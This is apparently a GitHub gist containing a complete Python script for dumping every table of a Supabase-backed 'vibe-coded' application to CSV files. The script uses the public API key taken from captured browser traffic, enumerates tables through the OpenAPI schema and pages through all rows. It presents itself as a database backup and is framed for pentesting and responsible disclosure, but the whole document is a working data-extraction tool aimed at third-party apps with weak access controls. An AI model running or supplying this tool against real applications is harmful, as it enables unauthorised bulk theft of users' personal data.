Last active
November 14, 2025 10:47
-
-
Save RichardoC/c17bb9268d7e1c36ccd4c5dff02f29b3 to your computer and use it in GitHub Desktop.
For dumping databases of vibe-coded applications while pentesting them/doing responsible disclosure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Supabase Database Backup Script | |
| Discovers all tables and exports each to a separate CSV file. | |
| No external dependencies required - uses only Python standard library. | |
| Vibe coded with Claude Code | |
| """ | |
| import urllib.request | |
| import urllib.error | |
| import json | |
| import csv | |
| import sys | |
| from typing import List, Dict, Any | |
import os

# Supabase configuration (extracted from HAR file).
# Each value can be overridden through an environment variable so the script
# does not have to be edited for every target; the literals are the fallbacks.

# Base URL of the project - find it in the API calls your browser made to the
# vibe-coded application. A trailing slash is dropped because the request
# paths appended to this value already start with "/".
SUPABASE_URL = (os.environ.get("SUPABASE_URL") or "https://example.supabase.co").rstrip("/")

# Value of the `apikey` header in those same browser API calls.
API_KEY = os.environ.get("SUPABASE_API_KEY") or "REDACTED"
def make_request(url: str, headers: Dict[str, str], timeout: float = 30.0) -> Any:
    """Make an HTTP request and return the parsed JSON response.

    Args:
        url: Full URL to request.
        headers: HTTP headers to send with the request.
        timeout: Seconds to wait on the connection before giving up, so a
            stalled server cannot hang the whole run.

    Returns:
        The decoded JSON body, or None when the request or the decoding
        failed. Failures are reported on stdout rather than raised.
    """
    try:
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as response:
            return json.loads(response.read().decode('utf-8'))
    except urllib.error.HTTPError as e:
        print(f"HTTP Error {e.code}: {e.reason}")
        print(f"URL: {url}")
        # errors='replace' keeps a non-UTF-8 error page from raising a
        # UnicodeDecodeError out of this handler.
        print(f"Response: {e.read().decode('utf-8', errors='replace')}")
        return None
    except Exception as e:
        # Deliberately broad: callers treat any failure (bad URL, network
        # error, timeout, invalid JSON) as "no data" and carry on.
        print(f"Error making request: {e}")
        return None
def discover_tables() -> List[str]:
    """Discover all available tables by fetching the OpenAPI schema.

    PostgREST exposes an OpenAPI spec that lists all available
    endpoints/tables. The spec is requested from the REST root endpoint and
    every top-level path in it is taken as a table name.

    Returns:
        The discovered table names. When the schema cannot be fetched or has
        no usable 'paths' mapping, a fixed list of fallback names is returned
        instead.
    """
    print("Discovering tables...")
    headers = {
        'apikey': API_KEY,
        'Authorization': f'Bearer {API_KEY}',
        'Accept': 'application/openapi+json'
    }
    # Get OpenAPI schema from PostgREST root endpoint
    schema = make_request(SUPABASE_URL + '/rest/v1/', headers)
    # Type-check instead of relying on truthiness: an unexpected JSON payload
    # (list, string, ...) must take the fallback path rather than crash below.
    if not isinstance(schema, dict) or not isinstance(schema.get('paths'), dict):
        print("Warning: Could not fetch OpenAPI schema. Trying alternative method...")
        # Fallback: try common table names found in HAR file
        return ['sessions', 'feedback', 'leaderboard']
    # Extract table names from the paths
    tables = []
    for path in schema['paths']:
        # Paths are like "/{table_name}"; templated paths are not tables.
        if not path.startswith('/') or '{' in path:
            continue
        table_name = path.strip('/')
        # Skip the root path ("" after stripping) and the RPC namespace:
        # both the bare "/rpc" endpoint and function paths "/rpc/<name>".
        if not table_name or table_name == 'rpc' or table_name.startswith('rpc/'):
            continue
        tables.append(table_name)
    print(f"Discovered {len(tables)} tables: {', '.join(tables)}")
    return tables
def fetch_table_data(table_name: str) -> List[Dict[str, Any]]:
    """Fetch all data from a table, one page at a time.

    Args:
        table_name: Name of the table to read.

    Returns:
        Every row received, or an empty list if any page request failed
        (rows collected before the failure are discarded).
    """
    # Function-scope import so this block brings its own dependency.
    from urllib.parse import quote

    print(f"Fetching data from '{table_name}'...", end=' ')
    headers = {
        'apikey': API_KEY,
        'Authorization': f'Bearer {API_KEY}',
        'Content-Type': 'application/json',
        'Prefer': 'return=representation'
    }
    # Percent-encode the name so spaces or reserved characters cannot break
    # the URL or be read as extra path segments.
    endpoint = f"{SUPABASE_URL}/rest/v1/{quote(table_name, safe='')}"
    all_data = []
    offset = 0
    limit = 1000  # Ask for batches of 1000
    while True:
        # Construct URL with pagination
        # NOTE(review): no explicit ordering is requested, so page boundaries
        # may shift if the table is written to during the dump - confirm
        # whether an `order` parameter is wanted.
        url = f"{endpoint}?select=*&limit={limit}&offset={offset}"
        data = make_request(url, headers)
        # None means the request failed; any other non-list payload is not a
        # row set and must not be merged into the results.
        if not isinstance(data, list):
            print(f"Failed to fetch data from '{table_name}'")
            return []
        if not data:  # Empty page means we've fetched all data
            break
        all_data.extend(data)
        # Advance by the rows actually received and keep going until an empty
        # page arrives. A short page is not proof of the end: the server may
        # cap responses below `limit`, and stopping there would truncate the
        # dump.
        offset += len(data)
    print(f"fetched {len(all_data)} rows")
    return all_data
def _csv_cell(value: Any) -> Any:
    """Return a CSV-friendly form of one decoded JSON value."""
    # Nested structures would otherwise be written as Python repr
    # ("{'a': 1}"), which cannot be parsed back; JSON text round-trips.
    if isinstance(value, (dict, list)):
        return json.dumps(value, ensure_ascii=False)
    return value


def export_to_csv(table_name: str, data: List[Dict[str, Any]]) -> None:
    """Export table data to a CSV file named '<table_name>.csv'.

    The header is the sorted union of all keys seen in any row; rows missing
    a key get an empty cell. Nested dict/list values are written as JSON text.

    Args:
        table_name: Table name, used for the output filename and messages.
        data: Rows to write, one dict per row.

    Returns:
        None. Success or failure is reported on stdout; errors are not raised.
    """
    if not data:
        print(f" No data to export for '{table_name}'")
        return
    filename = f"{table_name}.csv"
    try:
        # Convert rows before opening the file so malformed input fails
        # without leaving a truncated file behind.
        rows = [{key: _csv_cell(value) for key, value in row.items()} for row in data]
        # Get all unique column names from the data
        columns = sorted({key for row in rows for key in row})
        # Write CSV file
        with open(filename, 'w', newline='', encoding='utf-8') as csvfile:
            writer = csv.DictWriter(csvfile, fieldnames=columns)
            writer.writeheader()
            writer.writerows(rows)
        print(f" Exported to '{filename}'")
    except Exception as e:
        # Deliberately broad: one table that cannot be written must not
        # abort the export of the remaining tables.
        print(f" Error exporting '{table_name}': {e}")
def main():
    """Run the backup: discover the tables, then dump each one to CSV.

    Exits with status 1 when table discovery returns nothing. A table whose
    fetch returns no rows is reported as skipped; every other table is
    passed to the CSV export and counted in the final summary.
    """
    banner = "=" * 60
    print(banner)
    print("Supabase Database Backup")
    print(banner)
    print()

    # Step 1: find out which tables exist
    table_names = discover_tables()
    if not table_names:
        print("Error: No tables found!")
        sys.exit(1)

    print()
    print("Starting backup...")
    print()

    # Step 2: dump the tables one by one
    exported = 0
    for name in table_names:
        rows = fetch_table_data(name)
        if not rows:
            print(f" Skipped '{name}' (no data or error)")
            continue
        export_to_csv(name, rows)
        exported += 1

    # Step 3: summary
    print()
    print(banner)
    print(f"Backup complete! Successfully backed up {exported}/{len(table_names)} tables")
    print(banner)


# Run the backup only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment